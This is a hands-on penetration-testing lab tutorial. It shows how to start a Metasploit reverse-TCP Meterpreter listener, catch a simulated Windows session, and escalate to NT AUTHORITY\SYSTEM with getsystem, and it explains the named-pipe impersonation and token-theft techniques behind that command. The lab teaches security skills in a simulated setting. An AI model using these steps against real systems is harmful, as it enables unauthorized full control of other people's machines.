LabEx
Log InJoin Free

Escalate Privileges with getsystem in Meterpreter

Kali LinuxBeginner
Practice Now

Introduction

In the field of penetration testing, gaining initial access to a target system is only the beginning. Often, the initial foothold is a low-privileged user account with limited permissions. To gain full control over the system, you must escalate your privileges to a higher-level account, such as Administrator or, even better, NT AUTHORITY\SYSTEM on Windows. This process is known as privilege escalation.

The Metasploit Framework provides a powerful post-exploitation payload called Meterpreter, which includes a versatile command, getsystem, designed specifically for this purpose. This command automates various techniques to elevate the current session's privileges to the highest level.

In this lab, you will step into the role of an attacker who has already gained a basic Meterpreter session on a Windows target. You will learn how to use the getsystem command to elevate your privileges and confirm your new level of access.

Establish a Meterpreter session on a Windows target

In this step, we will simulate gaining a Meterpreter session. First, we need to start the Metasploit Framework console and configure a listener to "catch" the incoming connection from a compromised machine.

Open a terminal and start the Metasploit console in quiet mode to avoid the banner.

msfconsole -q

Once inside the msfconsole prompt, we will use the generic multi/handler module. This module is designed to handle incoming connections from various payloads.

use multi/handler

Next, we need to tell the handler which payload to expect. For this lab, we'll use a standard Windows Meterpreter reverse TCP payload.

set payload windows/meterpreter/reverse_tcp

We also need to configure the listener's IP address (LHOST) and port (LPORT). We'll set LHOST to 127.0.0.1 (localhost) and LPORT to 4444.

set LHOST 127.0.0.1
set LPORT 4444

Now, start the listener by running the exploit command. We use the -j flag to run it as a background job, which will keep the msfconsole prompt available for other commands.

exploit -j

You should see a confirmation that the handler has started.

[*] Exploit running as background job 0.
[*] Started reverse TCP handler on 127.0.0.1:4444

For this lab, a background process will now simulate a compromised Windows host connecting back to you. After a few moments, you should see a message indicating that a Meterpreter session has been opened.

[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:49152) at YYYY-MM-DD HH:MM:SS +0000

To interact with this new session, use the sessions command with the -i flag followed by the session ID.

sessions -i 1

Your prompt should change to meterpreter>, indicating you are now inside the Meterpreter session on the target machine.

meterpreter >

Check your current privileges with getprivs

In this step, before attempting to escalate, it's crucial to understand the privileges our current user account holds. In Windows, privileges determine what specific system-level operations a user can perform, such as debugging programs or shutting down the system.

Meterpreter provides the getprivs command to enumerate the privileges associated with the current process token.

Now that you are in the meterpreter> prompt, run the getprivs command:

getprivs

The output will list all the privileges held by the current user process. Some privileges are enabled by default, while others may be disabled.

============================================================
Enabled Process Privileges
============================================================
  SeChangeNotifyPrivilege
  SeIncreaseQuotaPrivilege
  SeShutdownPrivilege
  SeTimeZonePrivilege
  SeUndockPrivilege

This output tells us our current capabilities. For many escalation techniques to work, certain privileges like SeDebugPrivilege or SeImpersonatePrivilege are required. Seeing this list helps us plan our next move.

Attempt to elevate to SYSTEM using the getsystem command

In this step, we will use Meterpreter's primary command for privilege escalation: getsystem. This command is a powerful script that automatically tries several different techniques to elevate the session's privileges to NT AUTHORITY\SYSTEM.

The NT AUTHORITY\SYSTEM account is the most powerful account on a Windows system, with virtually unrestricted access to all resources. Gaining control of this account is often the main goal of post-exploitation.

From your meterpreter> prompt, simply run the getsystem command:

getsystem

Meterpreter will now attempt various techniques. If successful, you will see a message indicating which technique worked. The most common successful outcome is via "Named Pipe Impersonation".

meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).

If the command returns a success message, you have likely succeeded in escalating your privileges. If it fails, it means none of the automated techniques worked under the current user's context, which might be due to missing privileges or system hardening. For this lab, the command is expected to succeed.

Verify new privileges with getuid

In this step, after running getsystem, we need to verify that our privileges have actually been elevated. A simple way to do this is to check the user identity of our current session.

Meterpreter provides the getuid command for this purpose. It queries the system and returns the username that the Meterpreter server is currently running as.

In your meterpreter> prompt, run the getuid command:

getuid

If the getsystem command was successful, the output should now show that you are the SYSTEM user.

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Seeing NT AUTHORITY\SYSTEM as the server username is the definitive confirmation of a successful privilege escalation. You now have the highest level of control over the target machine. If you had run getuid before getsystem, it would have shown the name of the low-privileged user you initially compromised.

Discuss different getsystem techniques

In this step, we will explore what happens behind the scenes when you run getsystem. This command is not a single, magical function; it's a script that cycles through a list of known Windows privilege escalation techniques.

To see the list of available techniques, you can use the help menu for the getsystem command by passing the -h flag.

getsystem -h

This will display the usage options and a list of the techniques it can employ.

Usage: getsystem [options]

Attempt to elevate your privilege to that of local system.

OPTIONS:

    -h   Help Banner.
    -t   The technique to use. (Default to trying all)

Techniques:
    0: All
    1: Named Pipe Impersonation (In Memory/Admin)
    2: Named Pipe Impersonation (Dropper/Admin)
    3: Token Duplication (Admin)

(Note: The number and name of techniques may vary slightly between Metasploit versions.)

Let's briefly break down what these techniques mean:

  • Named Pipe Impersonation (In Memory/Admin): This is the default and most reliable method. It creates a service that runs as SYSTEM, then creates a named pipe that the service connects to. Your process then impersonates the security context of that service, becoming SYSTEM. This is all done in memory. It typically requires Administrator-level privileges to succeed.
  • Named Pipe Impersonation (Dropper/Admin): This is similar to the first technique but involves dropping a file (a DLL) to the disk. This is less stealthy and more likely to be detected by antivirus software.
  • Token Duplication (Admin): This technique finds a process that is already running as SYSTEM, steals its access token, and applies it to your current process. This requires the SeDebugPrivilege, which allows you to inspect and debug other processes.

By default, getsystem tries all available techniques (-t 0) until one is successful. Understanding these methods helps you troubleshoot when getsystem fails and allows you to manually select a specific technique if you have more information about the target system's configuration.

Summary

In this lab, you have successfully performed one of the most critical post-exploitation tasks: privilege escalation. You learned how to leverage the Metasploit Framework and its Meterpreter payload to elevate your access on a Windows target from a standard user to the all-powerful NT AUTHORITY\SYSTEM account.

You walked through the entire process, from setting up a listener and establishing a session to verifying your final level of access. Specifically, you used:

  • msfconsole to set up a listener.
  • getprivs to enumerate your initial privileges.
  • getsystem to automatically escalate your privileges.
  • getuid to confirm that you had become NT AUTHORITY\SYSTEM.

Finally, you explored the different techniques that the getsystem command uses under the hood. This knowledge is invaluable for understanding why the command might succeed or fail in different environments. Mastering privilege escalation is a fundamental skill for any penetration tester, and getsystem is a powerful tool in your arsenal.

Related Kali Linux Courses
Kali Linux for Beginners

Kali Linux for Beginners

cybersecuritykalilinux
Kali Server Exploitation in Action

Kali Server Exploitation in Action

cybersecuritykalilinux